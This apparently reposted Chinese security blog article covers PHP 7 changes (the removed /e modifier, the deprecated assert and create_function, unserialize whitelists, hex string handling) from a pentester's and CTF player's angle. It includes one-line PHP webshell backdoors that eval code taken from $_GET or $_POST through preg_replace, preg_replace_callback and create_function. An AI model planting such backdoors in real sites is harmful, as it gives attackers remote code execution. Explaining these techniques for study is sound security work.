0X01 前言
本篇文章大多為轉載,但是修正了一些不正確的說法,對某些功能點的變更指出具體是哪個版本變更,加入了一些小更新。
(原文地址:https://www.freebuf.com/articles/web/197013.html ,作者:溫酒)
0x02 正文
函數修改
preg_replace()不再支持/e修飾符
<?php
preg_replace("/.*/e",$_GET["h"],".");
?>
利用\e修飾符執行代碼的后門大家也用了不少了,具體看官方的這段描述:
如果設置了這個被棄用的修飾符, preg_replace() 在進行了對替換字符串的 后向引用替換之后, 將替換后的字符串作為php 代碼評估執行(eval 函數方式),並使用執行結果 作為實際參與替換的字符串。單引號、雙引號、反斜線()和 NULL 字符在 后向引用替換時會被用反斜線轉義.
很不幸,在PHP7以上版本不在支持\e修飾符,同時官方給了我們一個新的函數preg_replace_callback:
這里我們稍微改動一下就可以利用它當我們的后門:
<?php
preg_replace_callback("/.*/",function ($a){@eval($a[0]);},$_GET["h"]);
?>
create_function()被廢棄(廢棄於php 7.2,但依然可用)
<?php
$func =create_function('',$_POST['cmd']);$func();
?>
少了一種可以利用當后門的函數,實際上它是通過執行eval實現的。可有可無。
mysql_*系列全員移除
如果你要在PHP7上面用老版本的mysql_*系列函數需要你自己去額外裝了,官方不在自帶,現在官方推薦的是mysqli或者pdo_mysql。這是否預示着未來SQL注入漏洞在PHP上的大幅減少呢~
去特么的預示,我已經很久沒在目標站上挖到過sql注入了,全都是預編譯!
unserialize()增加一個可選白名單參數
$data = unserialize($serializedObj1 , ["allowed_classes" => true]); $data2 = unserialize($serializedObj2 , ["allowed_classes" => ["MyClass1", "MyClass2"]]); 其實就是一個白名單,如果反序列數據里面的類名不在這個白名單內,就會報錯。
像這樣的報錯!
可以是類名也可以是布爾數據,如果是FALSE就會將所有的對象都轉換為__PHP_Incomplete_Class對象。TRUE是無限制。也可以傳入類名實現白名單。
媽的,還好現在是可選不是必選,要是默認
FALSE逼程序員弄白名單那就真的吐血了。
assert()默認不在可以執行代碼,(廢棄於php7.2,但依然可用)
這就是眾多馬不能用的罪魁禍首了,太多的馬用assert()來執行代碼了,這個更新基本就團滅,一般情況下修改成eval即可正常運行了~
提一下,菜刀在實現文件管理器的時候用的恰好也是assert函數,這導致菜刀沒辦法在PHP7上正常運行。
語法修改
foreach不再改變內部數組指針
<?php
$a = array('1','2','3');
foreach ($a as $k=>&$n){
echo "";
}
print_r($a);
foreach ($a as $k=>$n){
echo "";
}
print_r($a);
這樣的代碼在php5中,是這樣的執行結果:
因為數組最后一個元素的 $value 引用在 foreach 循環之后仍會保留,在第二個循環的時候實際上是對之前的指針不斷的賦值。php7中通過值遍歷時,操作的值為數組的副本,不在對后續操作進行影響。
這個改動影響了某些cms的洞在PHP7上無法利用了….你知道我指的是哪個洞的。
這個問題在PHP7.0.0以后的版本又被改回去了,只影響這一個版本。
8進制字符容錯率降低
在php5版本,如果一個八進制字符如果含有無效數字,該無效數字將被靜默刪節。
<?php
echo octdec( '012999999999999' ) . "\n";
echo octdec( '012' ) . "\n";
if (octdec( '012999999999999' )==octdec( '012' )){
echo ": )". "\n";
}
比如這樣的代碼在php5中的執行結果如下:
但是在php7里面會觸發一個解析錯誤。
這個問題同樣在PHP7.0.0以后的版本又被改回去了,只影響這一個版本。
十六進制字符串不再被認為是數字
這個修改一出,以后CTF套路會少很多啊~
很多騷操作都不能用了~
這個沒什么好說的,大家都懂。
<?php
var_dump("0x123" == "291");
var_dump(is_numeric("0x123"));
var_dump("0xe" + "0x1");
var_dump(substr("foo", "0x1"));
?>
以上代碼在PHP5運行結果如下:
PHP7運行結果如下:
你以為我要說這個在后續版本被改回去了?不,目前截至最新的PHP7.3版本依然沒有改回去的征兆,官方稱不會在改了。這個講道理還是蠻傷的。
移除了 ASP 和 script PHP 標簽
現在只有<?php ?>這樣的標簽能在php7上運行了。(PS:還可以使用<?= ?>)
字面意思,影響其實不是很大(只是以后騷套路會少一點)。
超大浮點數類型轉換截斷
將浮點數轉換為整數的時候,如果浮點數值太大,導致無法以整數表達的情況下, 在PHP5的版本中,轉換會直接將整數截斷,並不會引發錯誤。 在PHP7中,會報錯。
CTF又少一個出題套路,這個問題我只在CTF上見過,影響應該不大。
用戶定義函數傳遞參數數量容錯率降低(PHP7.1之后)
php 5,雖然報警告,但是依舊可以執行
php 7.0同樣
php 7.1 直接拋出錯誤
此選項的變化導致能玩的花樣受到了限制,容錯率降低了。
eval()代碼執行容錯率降低(php 7.0之后)
意思是,在執行eval()代碼中有錯誤,將會直接返回,不會再執行。
php 5
php 7
雜項
exec(), system() passthru()函數對 NULL 增加了保護.
list()不再能解開字符串string變量
$HTTP_RAW_POST_DATA被移除
__autoload()方法被廢棄(廢棄於php 7.2)
parse_str()不加第二個參數會直接把字符串導入當前的符號表,如果加了就會轉換稱一個數組。現在是第二個參數是強行選項了。(變更於php 7.2,第二個參數應為建議,不強制,依舊可以不使用第二個參數)
統一不同平台下的整型長度
session_start()可以加入一個數組覆蓋php.ini的配置